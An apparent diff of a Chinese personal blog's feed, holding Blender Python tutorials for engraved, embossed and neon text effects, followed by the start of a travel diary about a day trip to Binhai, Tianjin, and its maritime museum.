    emmmm 如果破了的话好像只能手动处理了。

    png


    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0] = 1.5
    cube_obj.scale[1] = 2.5

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    bpy.ops.object.convert(target="MESH")

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)

    bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
    bpy.ops.object.editmode_toggle()

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cube_obj.data.use_auto_smooth = True

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.005
    cube_modifier_bevel.segments = 5
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    cube_modifier_boolean.operation = "UNION"

    Engrave or Carve Text On Curved Surface | Part 4 in Text Effects | Blender Eevee & Cycles

    1. 新建一个圆柱体:

    png

    1
    2
    3
    4
    5
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    png

    1
    cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

    png

    1
    2
    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    png

    1
    2
    3
    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")
    1. 新建一个文本对象:

    png

    1
    2
    3
    4
    5
    text_obj.location[0] = 1.22
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    png

    1
    2
    text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
    text_obj.data.body = "I❤\nYOU"
    1
    2
    text_obj.data.size = 0.9
    text_obj.data.space_line = 0.75

    png

    1
    bpy.ops.object.convert(target="MESH")

    png

    1
    2
    3
    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    png

    1
    2
    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2

    png

    png

    1
    2
    bpy.ops.object.shade_smooth()
    text_obj.data.use_auto_smooth = True

    png

    1
    2
    3
    4
    5
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    png

    1
    2
    3
    4
    5
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Y"

    png

    1
    2
    3
    4
    5
    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    png

    1
    2
    3
    4
    5
    6
    7
    8
    cylinder_material = bpy.data.materials.new(name="Material")
    cylinder_material.use_nodes = True
    nodes = cylinder_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

    cylinder_obj.data.materials.append(cylinder_material)

    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.22
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
    text_obj.data.body = "I❤\nYOU"

    text_obj.data.size = 0.9
    text_obj.data.space_line = 0.75

    bpy.ops.object.convert(target="MESH")

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2


    bpy.ops.object.shade_smooth()
    text_obj.data.use_auto_smooth = True

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Y"

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    cylinder_material = bpy.data.materials.new(name="Material")
    cylinder_material.use_nodes = True
    nodes = cylinder_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

    cylinder_obj.data.materials.append(cylinder_material)

    Emboss Any Text On Curved Surface | Bend Any Text | Part 5 in Text Effects | Blender Eevee & Cycles

    1. 新建一个圆柱体。

    png

    1
    2
    3
    4
    5
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object
    1. 添加 Edgesplit,并应用,分离边:

    png

    1
    2
    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")
    1. 添加 Subdivision,并应用,使得物体更平滑:

    png

    1
    2
    3
    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")
    1. 新建一个 Text,调整其参数:

    png

    1
    2
    3
    4
    5
    6
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.1
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    设置文字内容:

    png

    1
    text_obj.data.body = "Hello,\nWorld!"

    png

    1
    2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    png

    1
    text_obj.data.size = 0.5
    1. 添加一个 Solidify 修改器,挤出 0.15 m:

    png

    1
    2
    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.15
    1. Text 转成 Mesh

    png

    1
    bpy.ops.object.convert(target="MESH")
    1. Remesh 处理:

    png

    1
    2
    3
    4
    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False
    1. Decimate处理以减少边的数量:

    png

    1
    2
    3
    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")
    1. 平滑处理:

    png

    png

    png

    1
    2
    3
    4
    5
    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cylinder_obj.data.use_auto_smooth = True
    1. 新建一个 Empty,位置和 Text 相同,用于文本弯曲:

    png

    1
    2
    3
    4
    5
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2
    1. 设置 SimpleDeform,使 Text 弯曲:

    png

    1
    2
    3
    4
    5
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 2
    text_modifier_simple_deform.deform_axis = "Y"
    1. 形成浮雕有一个简单的方法:ObjectJoin

    png

    1. 如果不用 Join,改用 Boolean 运算:

    png

    1
    2
    3
    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.operation = "UNION"
    cylinder_modifier_boolean.object = text_obj
    1. 添加 Bevel 使得斜角效果:

    png

    1
    2
    3
    4
    5
    cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
    cylinder_modifier_bevel.width = 0.005
    cylinder_modifier_bevel.segments = 5
    cylinder_modifier_bevel.use_clamp_overlap = False
    cylinder_modifier_bevel.harden_normals = True
    1
    2
    text_obj.hide_viewport = True
    text_obj.hide_render = True
    1. 如果有破,只能自己拿工具填边了:

    png


    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.1
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.data.size = 0.5

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.15

    bpy.ops.object.convert(target="MESH")

    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cylinder_obj.data.use_auto_smooth = True

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 2
    text_modifier_simple_deform.deform_axis = "Y"

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.operation = "UNION"
    cylinder_modifier_boolean.object = text_obj

    cylinder_modifier_bevel = cylinder_obj.modifiers.new(name="Bevel", type="BEVEL")
    cylinder_modifier_bevel.width = 0.005
    cylinder_modifier_bevel.segments = 5
    cylinder_modifier_bevel.use_clamp_overlap = False
    cylinder_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    Neon Light or Neon Sign In Blender | Easy & Realistic Method For Blender Eevee (All Versions)

    1. 新建一个 Text 对象,调整其参数:

    png

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import bpy
    import numpy as np
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    text_obj.data.space_line = 1.2
    1. 修改文字:

    png

    1
    text_obj.data.body = "BARBEQUE\nNATION"
    1. Neon Future Font | dafont.com 找一个适合霓虹灯的字体,应用之:

    png

    1
    2
    3
    font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf'))
    text_obj.data.font = bpy.data.fonts.load(font_path)
    1. 设置 extrude

    png

    1
    text_obj.data.extrude = 0.02
    1. 添加一个 emission 的材质,设置参数:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    text_material = bpy.data.materials.new(name="Emission")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes

    for node in nodes:
    nodes.remove(node)

    emission_node = nodes.new(type='ShaderNodeEmission')
    emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
    emission_node.inputs[1].default_value = 4

    output_node = nodes.new(type='ShaderNodeOutputMaterial')
    links = text_material.node_tree.links
    links.new(emission_node.outputs[0], output_node.inputs[0])

    text_obj.data.materials.append(text_material)
    1. 设置 scene 里的 Bloom

    png

    1
    2
    3
    4
    bpy.context.scene.eevee.use_bloom = True
    bpy.context.scene.eevee.bloom_radius = 3
    bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
    bpy.context.scene.eevee.bloom_intensity = 0.25
    1. 新建一个 plane,用于接受霓虹灯的光线:

    png

    1
    2
    3
    4
    5
    6
    bpy.ops.mesh.primitive_plane_add()
    plane_obj = bpy.context.object
    plane_obj.rotation_euler[1] = np.pi / 2
    plane_obj.scale[0] = 2.5
    plane_obj.scale[1] = 3.5
    plane_obj.location[0] = -0.25
    1. 从网上找一张贴图,给这个 plane 一个贴图的纹理:

    png

    1
    2
    3
    4
    5
    6
    7
    plane_material = bpy.data.materials.new(name="Wall")
    plane_material.use_nodes = True
    nodes = plane_material.node_tree.nodes

    image_texture_node = nodes.new(type='ShaderNodeTexImage')
    image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './texture/Wall.jpg')))
    1. 调整其 shader nodes,翻转贴图:

    png

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    mapping_node = nodes.new(type='ShaderNodeMapping')
    mapping_node.inputs[2].default_value[2] = np.pi / 2

    texcoord_node = nodes.new(type="ShaderNodeTexCoord")

    links = plane_material.node_tree.links
    links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
    links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
    links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

    plane_obj.data.materials.append(plane_material)
    1. 添加环境光探针,大小包围平面和文字:

    png

    1
    bpy.ops.object.lightprobe_add(type="GRID")
    1. 将 Light Probe 的大小包围屏幕和文字:

    png

    1
    2
    lightprobe_obj = bpy.context.object
    lightprobe_obj.scale[0:3] = [1, 3.5, 2]
    1. Bake Cubemap Only

    png

    1. 调低背景亮度,Screen Space Reflections

    png

    1
    2
    bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
    bpy.context.scene.eevee.use_ssr = True
    1. 添加点光源,补充亮度:

    png

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    light_obj_list = []
    for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
    light_obj_list[-1].location[1] = -2 + i
    light_obj_list[-1].location[2] = 0.5
    else:
    light_obj_list[-1].location[1] = -6 + i
    light_obj_list[-1].location[2] = -0.5

    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    import bpy
    import numpy as np
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    text_obj.data.space_line = 1.2

    text_obj.data.extrude = 0.02

    text_obj.data.body = "BARBEQUE\nNATION"
    font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf'))
    text_obj.data.font = bpy.data.fonts.load(font_path)

    text_material = bpy.data.materials.new(name="Emission")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes

    for node in nodes:
    nodes.remove(node)

    emission_node = nodes.new(type='ShaderNodeEmission')
    emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
    emission_node.inputs[1].default_value = 4

    output_node = nodes.new(type='ShaderNodeOutputMaterial')
    links = text_material.node_tree.links
    links.new(emission_node.outputs[0], output_node.inputs[0])

    text_obj.data.materials.append(text_material)

    bpy.context.scene.eevee.use_bloom = True
    bpy.context.scene.eevee.bloom_radius = 3
    bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
    bpy.context.scene.eevee.bloom_intensity = 0.25

    bpy.ops.mesh.primitive_plane_add()
    plane_obj = bpy.context.object
    plane_obj.rotation_euler[1] = np.pi / 2
    plane_obj.scale[0] = 2.5
    plane_obj.scale[1] = 3.5
    plane_obj.location[0] = -0.25

    plane_material = bpy.data.materials.new(name="Wall")
    plane_material.use_nodes = True
    nodes = plane_material.node_tree.nodes

    image_texture_node = nodes.new(type='ShaderNodeTexImage')
    image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './texture/Wall.jpg')))

    mapping_node = nodes.new(type='ShaderNodeMapping')
    mapping_node.inputs[2].default_value[2] = np.pi / 2

    texcoord_node = nodes.new(type="ShaderNodeTexCoord")

    links = plane_material.node_tree.links
    links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
    links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
    links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

    plane_obj.data.materials.append(plane_material)

    bpy.ops.object.lightprobe_add(type="GRID")
    lightprobe_obj = bpy.context.object
    lightprobe_obj.scale[0:3] = [1, 3.5, 2]

    bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
    bpy.context.scene.eevee.use_ssr = True

    light_obj_list = []
    for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
    light_obj_list[-1].location[1] = -2 + i
    light_obj_list[-1].location[2] = 0.5
    else:
    light_obj_list[-1].location[1] = -6 + i
    light_obj_list[-1].location[2] = -0.5
    ]]>
    @@ -6180,7 +6180,7 @@ /posts/Diary-%E5%B9%B3%E6%B7%A1%E7%9A%84%E7%AC%AC%2015%20%E5%91%A8%E5%92%8C%E7%96%AF%E7%8B%82%E7%9A%84%E7%AC%AC%2016%20%E5%91%A8/ -
    ]]>
    +
    ]]>
    @@ -6236,7 +6236,7 @@ /posts/Diary-%E6%B4%A5%E4%BA%86%EF%BC%88%E6%BB%A8%E6%B5%B7%E7%AF%87%EF%BC%89/ - 前言
            

    因为导师闺女要高考管不了我们,就跟杰哥工作日偷跑天津嘻嘻嘻

    ​ 这篇博客是 6.6 在天津滨海新城带忻州海军看海的流水账🤪!

    正文

    1. 去程高铁

    ​ 高铁票¥79:

    • 07:54 保定东
    • 08:09 白洋淀
    • 08:22 白沟
    • 08:48 胜芳
    • 09:06 天津西
    • 09:30 滨海西

    ​ 第一坑,走的时候才发觉自己背的东西有点重😅。

    07:29 公交车

    jpg

    ​ 规划好 6:40 起床去食堂吃个早饭,然后乘 33/39/70 路公交去保定东站。

    07:33 京畿之门

    jpg

    ​ 京畿之门,又见面了!

    08:07 雄安

    jpg

    ​ 坐高铁的路上经过了雄安,emmmm 没感觉有多牛逼,还是苍茫的华北平原。

    08:18 白洋淀?也许是吧

    jpg

    ​ 这段风景还不错。

    08:58 津了!

    jpg

    ​ 进入天津市,看到一堆火电厂?

    09:06 天津西

    jpg

    ​ 天津西站,又见面了!全国前几大的火车站。

    ​截至 2011 年 6 月,天津西站建筑总面积达 18 万平方米,设计年发送旅客 2367 万人次,最高聚集人数达 5000 人;站场规模为 13 台 26 线。

    09:40 滨海西

    jpg

    ​ 巨大但又没什么人的滨海西站,刚下站就有一堆黑车司机尝试拉我们上车🫣,有当年逛厦门那味了,不愧是旅游城市。

    ​ 但是呢,我已经做好了规划,第一站是乘 934 路 → 128 路 / 124 路 → 133 路去南堤滨海步道公园,¥2 * 2 = 4。拒绝上黑车嘻嘻。

    ​ 中间喜提第二坑,天津公交和滨海公交用的不是一张卡,还好有杰杰🤪。

    2. 滨海妈祖文化园

    09:50 国家自主创新示范区

    jpg

    ​ 看得出滨海新城是天津打算大力发展的一个地方,就跟福州要发展长乐滨海新城一样。天津的滨海新城都成为副省级了啊,牛逼牛逼。

    10:03 厦门路

    jpg

    ​ 乘公交车发现来到了厦门路🤨。天津把全国各个市的名称都作为了路名。

    10:29 下车!

    jpg

    ​ 下车!不得不说北方的路修得是真宽。等公交车的时候无聊看车牌,居然还能看到泉州的车牌🤨。

    10:34 雀巢

    jpg

    ​ 雀巢公司,是一间瑞士跨国食品和饮料公司,总部位于瑞士沃州沃韦,在全球拥有 500 多家工厂。它是世界上最大的食品制造商。最初是以生产婴儿食品起家,后来开始生产巧克力棒和速溶咖啡。

    ​ 雀巢公司门口中国和瑞士的国旗飘飘,这才知道雀巢原来是瑞士的。

    10:44 海

    jpg

    ​ 公交车外的跨海大桥和起重机。

    10:54 执行 plan B

    jpg

    ​ 下车了,导航说离南堤滨海步道公园还有 1.2 公里,这个公里打车太近走路太远,还好有共享单车。

    ​ 天津居然有共享电车😍?于是我跟杰杰说不如直接骑车沿海去一个更大的地方——滨海妈祖文化园。

    11:02 开骑!

    jpg

    ​ 于是开骑!喜提第三坑,杰杰的电车有 bug,一直监测不到头盔佩戴,搞得车供电断断续续的😅。

    11:20 渤海

    jpg

    ​ 广袤无垠的渤海。

    11:52 下车!

    jpg

    ​ 下车,骑行 54min 34s,12km,¥9。喜提第四坑,这个海滩没有沙滩,不需要带拖鞋😅。

    ​ 妈祖文化园,全称天津滨海妈祖文化园区,是一个园区。位于天津滨海新区的汉沽营城镇蔡家堡村滩涂海域,地处滨海旅游区南部填海区域的北堤路与东堤路交汇处,总占地 3.9 万平方米,总建筑面积 4033 平方米,三面环海,景色优美。2008 年由原汉沽区政府与台中县大甲镇澜宫共同合作,选址在汉沽营城镇蔡家堡村滩涂海域,东临天津中心渔港,南临渤海。西临航母主题公园围海东堤,北临海滨大道。全部填海造陆而成,总投资约 40 亿元,着力打造以妈祖文化为主干的集旅游、商业、娱乐、餐饮为一体的综合园区。

    11:56 天后宫

    jpg

    ​ 左鼓楼右钟楼,中间就是天后宫。这才知道为啥福州这么多天后宫,原来是纪念妈祖的庙🤔。

    12:03 各种庙

    jpg

    ​ 里面有点正定古城的味道,反正就是庙。

    12:07 妈祖像

    jpg

    ​ 这个妈祖像有 42m 高,世界第一!

    妈祖的传说

    ​ 妈祖(又称天后、天妃)原名林默,宋建隆元年(公元 960 年)农历 3 月 23 日于福建莆田沿海的一个渔村一一贤良港,她自幼聪颖敏 睿、心地善良,善游泳并能观天象,能为出海渔船指点气候信息,并勇救难,深受人们信任和爱戴,在一次救护海难中她不幸遇难,年仅 28 岁。当时人们不能接受这一事实而宁愿相信她升天,认为她原是天上下凡逐救苦难的神仙。于是,深切缅怀她的人们立庙祭祀并祈求她的佑护,传说这些祈求往往能如愿,尤其是海事更是灵验。于是她成为海内外善男信女心目中的“海上保护神”。从宋代至近代。建庙近 5000 座,信众达 2 亿,妈祖受历代皇帝褒封 36 次,封号有“天后”、“天妃“失人直至“上天圣母”等。关于妈祖的传授也在民间广为流传。今日,妈祖更是成为海峡两岸的“和平使者“。妈祖崇拜已形成内容深广的妈祖文化,成为中华民族优秀文化的一部分。

    ——妈祖像前面的碑文

    12:09 彩旗飘飘

    jpg

    ​ 看完妈祖像,忻州海军去海边瞎玩去了,我在等他的时间里就把之前买好的面包当午餐了🤨,感觉提前在食堂买好卤肉卷或是煎饼会更好些。这边好像没什么车交通不是很便利,还好之前骑过来的共享电车没被人骑走。

    3. 天津 · 国家海洋博物馆

    13:03 海博馆招牌

    jpg

    ​ 骑行 26min 56s,8.3km,¥4.5。这个门票要提前预约但是不要钱,还好我规划完备嘻嘻嘻。

    13:06 海博馆外围

    jpg

    ​ 拍一张海博馆外围。预约的时间段是 13:00—16:30,但是里面非常大,一阵赶路这些时间都是逛不完的。作为一架无情的拍照机器,拍了 254 张照片!

    ​ 写博客的时候才发现还有一些免费的馆没进去逛,西内。

    ​ 天津国家海洋博物馆占地面积 150000 平米,建筑面积 8 万平米,展厅面积共约 2.3 万平方米,建筑主体 3 层局部 4 层,共设六大展区 15 个展厅,包括:海洋自然展区、中华海洋文明展区、海洋互动展区、宣教中心区、海洋生态展区、高端合作及临时展览区,同时设有博物馆商店、餐厅、咖啡厅、影院等公共服务设施。

    13:15 龙的时代

    jpg

    ​ 龙的时代展厅通过展览鱼龙、翼龙化石及霸王龙化石模型揭示海洋是生命的摇篮这一主题。

    13:29 中华海洋文明第三篇章

    jpg

    ​ 展示了许多中国航海器械模型。

    ​ 中华海洋文明第三篇章展厅位于 3 号馆二层,展厅面积 930 平米。展览通过模型、复合沙盘、多媒体、互动展项等方式,展示出我国作为 21 世纪的海洋大国,着眼于中国特色社会主义事业发展全局,统筹国内外两个大局,坚持陆海统筹,坚持走依海富国、以海强国、人海和谐、合作共赢的发展道路,扎实推进海洋强国建设的历程。

    13:39 中华海洋文明第二篇章

    jpg

    ​ 介绍了中国明清的海事历史,这里还能看到很多福建元素🧐。

    ​ 中华海洋文明第二篇章位于 4 号馆二层,展厅面积 1195 平米。展现了明清之际,在禁海与开海的不断争论中,对外贸易与交往的步伐从未停滞。鸦片战争引发了中国人的海洋危机意识,在不屈抗争的同时,国人也积极吸纳西方海洋文明,发展海洋经济,维护海洋权益,探索海洋发展的近代化之路。

    ​ emmm 就是被西方国家胖揍的历史。

    13:58 游轮

    jpg

    ​ 上船¥100 一人,还是算了🫤。

    13:59 飞机

    jpg

    ​ 战斗机模型。

    14:02 海博馆外围

    jpg

    ​ 海博馆外围再转转,又进去了,外面有烧烤项目,但是这价格 emmmm,我宁可不吃午饭也不吃🫤。

    14:27 远古海洋

    jpg

    jpg

